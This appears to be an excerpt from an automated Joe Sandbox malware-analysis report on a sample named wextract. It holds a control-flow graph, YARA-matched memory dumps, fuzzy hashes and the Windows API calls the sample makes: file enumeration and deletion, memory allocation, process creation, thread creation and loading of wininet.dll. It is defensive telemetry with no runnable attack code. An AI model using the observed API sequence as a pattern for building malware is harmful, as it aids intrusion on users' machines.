85143 4184c4 85141->85143 85142 418474 85143->85142 85145 416d30 85143->85145 85146 416d46 85145->85146 85148 416d7f 85145->85148 85146->85148 85149 416ba0 LdrLoadDll 85146->85149 85148->85142 85149->85148 85150 421779 85151 
42177f 85150->85151 85152 4290d0 NtClose 85151->85152 85153 421784 85151->85153 85154 4217a9 85152->85154 85155 411f7f 85156 411f18 85155->85156 85156->85155 85157 428710 LdrInitializeThunk 85156->85157 85161 411ffd 85156->85161 85158 411f46 85157->85158 85162 429170 85158->85162 85160 411f5b 85163 4291ff 85162->85163 85164 42919b 85162->85164 85167 4602e80 LdrInitializeThunk 85163->85167 85164->85160 85165 429230 85165->85160 85167->85165

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 26 409b80-409f02 27 409f04-409f0a 26->27 28 409f0d-409f11 26->28 27->28 29 409f13-409f2c 28->29 30 409f2e-409f35 28->30 29->27 31 409f40-409f46 30->31 32 409f48-409f5a 31->32 33 409f5c-409f6a 31->33 32->31 34 409f75-409f7e 33->34 36 409f80-409f8a 34->36 37 409f8c-409f9a 34->37 36->34 38 409fa5-409fab 37->38 40 409fad-409fbc 38->40 41 409fbe-409fce 38->41 40->38 42 409fd5-409fde 41->42 44 409fe4-409fe7 42->44 45 40a186-40a18d 42->45 46 409fed-409ff4 44->46 47 40a198-40a19e 45->47 50 40a025-40a02c 46->50 51 409ff6-40a023 46->51 48 40a1a0-40a1ac 47->48 49 40a1ae-40a1b5 47->49 48->47 52 40a25b-40a265 49->52 53 40a1bb-40a1bf 49->53 55 40a037-40a040 50->55 51->46 56 40a1e0-40a1e7 53->56 57 40a1c1-40a1de 53->57 58 40a042-40a052 55->58 59 40a054-40a05b 55->59 61 40a1f2-40a1f8 56->61 57->53 58->55 62 40a066-40a06f 59->62 63 40a206 call 42ae10 61->63 64 40a1fa-40a204 61->64 65 40a071-40a084 62->65 66 40a086-40a09f 62->66 71 40a20b-40a211 63->71 67 40a1e9-40a1ef 64->67 65->62 66->66 70 40a0a1-40a0a8 66->70 67->61 72 40a0b3-40a0b9 70->72 75 40a213-40a22b 71->75 76 40a22d-40a234 71->76 73 40a0d1-40a0e0 72->73 74 40a0bb-40a0c4 72->74 80 40a0e2-40a0eb 73->80 81 40a109-40a119 73->81 77 40a0c6-40a0c9 74->77 78 40a0cf 74->78 75->71 79 40a23f-40a245 76->79 77->78 78->72 79->52 84 40a247-40a259 79->84 85 40a107 80->85 86 40a0ed-40a105 80->86 81->81 82 40a11b-40a122 81->82 87 40a12d-40a133 82->87 84->79 85->45 86->80 89 40a135-40a147 87->89 90 40a149-40a15a 87->90 89->87 92 40a165-40a16b 90->92 93 40a181 92->93 94 40a16d-40a17f 92->94 93->42 94->92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: f$.l$3B$4$;h$>%$Ar$C$I$P$VS$a7$b}$d6$hx$k`$pj$vh$z\${$R$a${
                                                                                  • API String ID: 0-3243794530
                                                                                  • Opcode ID: 0d9c431eb31dcdcbb603da09a7576789e32856bc450b525457a9274449c4a1e5
                                                                                  • Instruction ID: 03c64d3dfaaf28714b5ac79fbc34456881fc18d7ad7e1a3b333f598c931f5430
                                                                                  • Opcode Fuzzy Hash: 0d9c431eb31dcdcbb603da09a7576789e32856bc450b525457a9274449c4a1e5
                                                                                  • Instruction Fuzzy Hash: 1D12A0B0D05329CBEB24CF84C9987DDBBB1BB44308F20819AD5097B381D7B95A99DF46
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0041C384
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0041C3BF
                                                                                  • FindClose.KERNELBASE(?), ref: 0041C3CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 9e87784be811134206543ff6a91124e097d8d5776f875dc14713a20d1d22308b
                                                                                  • Instruction ID: 36b2de08793fd07eadd6fad27dcf3304ae29df80102fa77079a5de1b250efda6
                                                                                  • Opcode Fuzzy Hash: 9e87784be811134206543ff6a91124e097d8d5776f875dc14713a20d1d22308b
                                                                                  • Instruction Fuzzy Hash: 4131C371A00318BBDB20DB61CC85FEF737CDF44744F14445EB908A7191DA78AAC48BA8
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00428ED1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 8b2674f83d26bb9b9cc7bc7c46e7e21f0dfd6b85f2a87451696d0897736f1e3c
                                                                                  • Instruction ID: 50e443e416593c6712ff2e025c860828b3c5bd297b214149a3cc8e034b7e4645
                                                                                  • Opcode Fuzzy Hash: 8b2674f83d26bb9b9cc7bc7c46e7e21f0dfd6b85f2a87451696d0897736f1e3c
                                                                                  • Instruction Fuzzy Hash: 0731E4B1A04648AFCB14DF99D881EDEB7F9EF88304F50821AF919A7340D734A951CFA5
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00429026
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: f0a4af5ce10f85bb6fa20a4e860ade84654f9ae3d194782fdcda6e65f5ba91b7
                                                                                  • Instruction ID: 5d9db505ed945ef8b7f350511d024b445027c6ec5febbed7a2706fa73b7e5b78
                                                                                  • Opcode Fuzzy Hash: f0a4af5ce10f85bb6fa20a4e860ade84654f9ae3d194782fdcda6e65f5ba91b7
                                                                                  • Instruction Fuzzy Hash: 8231E5B5A00648AFCB14DF99D841EEFB7F9EF88314F10821AFD19A7240D634A911CFA5
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(004119DE,?,00427CFE,00000000,00000004,00003000,?,?,?,?,?,00427CFE,004119DE), ref: 0042930B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 41555825bf2f783df1a3daaaa86b83b36e5ea961c03c1e8bf0cfd5870d48d571
                                                                                  • Instruction ID: ecad808974ee85b35cff79529130522e26f4e42ed38775daec0018d95aabc8ef
                                                                                  • Opcode Fuzzy Hash: 41555825bf2f783df1a3daaaa86b83b36e5ea961c03c1e8bf0cfd5870d48d571
                                                                                  • Instruction Fuzzy Hash: 002137B1A04248AFDB10DF99DC41EEFB7B9EF88304F40811AFD09AB240D774A911CBA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: dca963f95815fc2a62f9dc0da00cc8e01f002ad0f6542e110fb244efc6502f9a
                                                                                  • Instruction ID: cd383ec2753f830c19edc15cd8624a4d4d40f7942a6cb736d1eb1d45d579a91b
                                                                                  • Opcode Fuzzy Hash: dca963f95815fc2a62f9dc0da00cc8e01f002ad0f6542e110fb244efc6502f9a
                                                                                  • Instruction Fuzzy Hash: 1B118F71A007186AD610EA55DC01FEFB3ACDB85314F40815AF90867281D6796915CBE5
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00429104
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
                                                                                  • Instruction ID: b039b26f07f083a67050750e89c2fdc1f12a21d443dc8365893339b3d2cbd5c3
                                                                                  • Opcode Fuzzy Hash: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
                                                                                  • Instruction Fuzzy Hash: 9CE046366206147BD620EA9ADC01F9BB7ACDBC5764F80401AFA09A7282C675B91186E9
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4b6c949a57d0fad1615afe7d6e8aafbc91a03e5c723051488ab88fad5f7df87c
                                                                                  • Instruction ID: 6731c2cbf93e5dc4bcb35c49067ae434b41e33003a4fcb72679ceea697ab5a11
                                                                                  • Opcode Fuzzy Hash: 4b6c949a57d0fad1615afe7d6e8aafbc91a03e5c723051488ab88fad5f7df87c
                                                                                  • Instruction Fuzzy Hash: 5290023164550403F1007558451470620058BD1205F69C412A0425669E9795DA5165A2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: be597208e75b5a13be31feca36af06637c68506aa61abf86eef8600f0fc34404
                                                                                  • Instruction ID: b14f3b264fe0e157c37592fc18bfea09f5b8f2c9b3110455811ab9a5c19f52cf
                                                                                  • Opcode Fuzzy Hash: be597208e75b5a13be31feca36af06637c68506aa61abf86eef8600f0fc34404
                                                                                  • Instruction Fuzzy Hash: 279002616415004361407558480440670059BE2305399C116A0555661D9718D9559269
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0aba922f10ab36ceebc265ee4264122af6d1092372bb08df404f892c384c9693
                                                                                  • Instruction ID: 06f3d1bee7133b5d96533ad189e58f2105ee639e800a8cf2f587ace067d43e2a
                                                                                  • Opcode Fuzzy Hash: 0aba922f10ab36ceebc265ee4264122af6d1092372bb08df404f892c384c9693
                                                                                  • Instruction Fuzzy Hash: 2690023164580013B1407558488454650059BE1305B59C012E0425655D9B14DA565361
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1328760edc28a7470ee9899e5a1f3425bc0e56f040716e1e1e586cfa6c4146c8
                                                                                  • Instruction ID: 7fe88fc5144c9cf6b57db1b4413efb1da58d1b9eb77de574ca0451d1a4219cb3
                                                                                  • Opcode Fuzzy Hash: 1328760edc28a7470ee9899e5a1f3425bc0e56f040716e1e1e586cfa6c4146c8
                                                                                  • Instruction Fuzzy Hash: 7A90023124140843F10075584404B4610058BE1305F59C017A0125755E9715D9517521
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 3f9948de459a2de044a9bdb9aef79844da5144238a81b577bc43ef02c31cd5d0
                                                                                  • Instruction ID: 282f45e47b620ee690bbc90a34cf2a906003564675d1d2c162016aea257c276d
                                                                                  • Opcode Fuzzy Hash: 3f9948de459a2de044a9bdb9aef79844da5144238a81b577bc43ef02c31cd5d0
                                                                                  • Instruction Fuzzy Hash: 7890023124148803F1107558840474A10058BD1305F5DC412A4425759E9795D9917121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8627477f57d208c55881f7f78240d42f7ad0da38badbe60a869a0ccedeecddd8
                                                                                  • Instruction ID: eb3c375407ed7b83403b61f882ba5e89cbfa9e081aa556d9a47c175b1e7df2be
                                                                                  • Opcode Fuzzy Hash: 8627477f57d208c55881f7f78240d42f7ad0da38badbe60a869a0ccedeecddd8
                                                                                  • Instruction Fuzzy Hash: 7A90023124140403F1007998540864610058BE1305F59D012A5025656FD765D9916131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0d7ce272c3b3ba96125337a8ef955ee12c150299944cd18ddb81ab1069ba5230
                                                                                  • Instruction ID: 3471f9bfcc4570487717768445fbc2359edd3a7369f49f33a504e8821f7c2cdc
                                                                                  • Opcode Fuzzy Hash: 0d7ce272c3b3ba96125337a8ef955ee12c150299944cd18ddb81ab1069ba5230
                                                                                  • Instruction Fuzzy Hash: 7090022134140003F140755854186065005DBE2305F59D012E0415655DEA15D9565222
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9b967a1240f70e384f9c13a62b1504b0b6cf2ec1ac51cfc1a105d644b0ed1f07
                                                                                  • Instruction ID: 08b4cd0d25259da904db4e9e0cdf1c79f2f935d44b2fd3ee7e274aa8fa2d3ae8
                                                                                  • Opcode Fuzzy Hash: 9b967a1240f70e384f9c13a62b1504b0b6cf2ec1ac51cfc1a105d644b0ed1f07
                                                                                  • Instruction Fuzzy Hash: BA90022925340003F1807558540860A10058BD2206F99D416A0016659DDA15D9695321
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 29197772c54552d56ef8f823f9ac0dbb25ceaa37ffc41656bba6211d8032b7a4
                                                                                  • Instruction ID: 2de59be46825acb221caf7cb9ff5cbf93c38ee03e39e35da043b5f6314e4f226
                                                                                  • Opcode Fuzzy Hash: 29197772c54552d56ef8f823f9ac0dbb25ceaa37ffc41656bba6211d8032b7a4
                                                                                  • Instruction Fuzzy Hash: 1F90023124140413F1117558450470710098BD1245F99C413A0425659EA756DA52A121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: db538f3e3da9b4bb5b1c97f60c95535db6666b5f842a3d2871ea51d8e3a5ba9c
                                                                                  • Instruction ID: 2fdee45193d69bb16bed822862b78fc0896203cea9402596ae9b800e0eebea7f
                                                                                  • Opcode Fuzzy Hash: db538f3e3da9b4bb5b1c97f60c95535db6666b5f842a3d2871ea51d8e3a5ba9c
                                                                                  • Instruction Fuzzy Hash: C5900221282441537545B558440450750069BE1245799C013A1415A51D9626E956D621
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2b1537f79484c4aa8cfc63b40e9c01627bcde052179839042869258e193b77c8
                                                                                  • Instruction ID: de57080b35265336f16cc7d4ee6efcdef858db1a09a5da73a9827fafad160e46
                                                                                  • Opcode Fuzzy Hash: 2b1537f79484c4aa8cfc63b40e9c01627bcde052179839042869258e193b77c8
                                                                                  • Instruction Fuzzy Hash: CF90026124180403F1407958480460710058BD1306F59C012A2065656F9B29DD516135
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a0a5080936b202205701d931a6a1839802b75226e675def0b4ecd61871b83c2a
                                                                                  • Instruction ID: 604cebcf570b8f73ad86f38528fac1d230774872d8eb544164605b066ab09e77
                                                                                  • Opcode Fuzzy Hash: a0a5080936b202205701d931a6a1839802b75226e675def0b4ecd61871b83c2a
                                                                                  • Instruction Fuzzy Hash: 4E90022164140503F10175584404616100A8BD1245F99C023A1025656FDB25DA92A131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f76531b0c7693f7f0afe2b60e6f5589620e64c4d52ab39b2a926567cddab44df
                                                                                  • Instruction ID: db0b8a6e8efa5ee6397668e824325909192847b82ba7dd9efa0efee51504158b
                                                                                  • Opcode Fuzzy Hash: f76531b0c7693f7f0afe2b60e6f5589620e64c4d52ab39b2a926567cddab44df
                                                                                  • Instruction Fuzzy Hash: C490026138140443F10075584414B061005CBE2305F59C016E1065655E9719DD526126
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 0042389B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414232
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,00417FBE,00000010,?,?,?,00000044,?,00000010,00417FBE,?,00000000,?), ref: 00429543
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409B65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409B65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  APIs
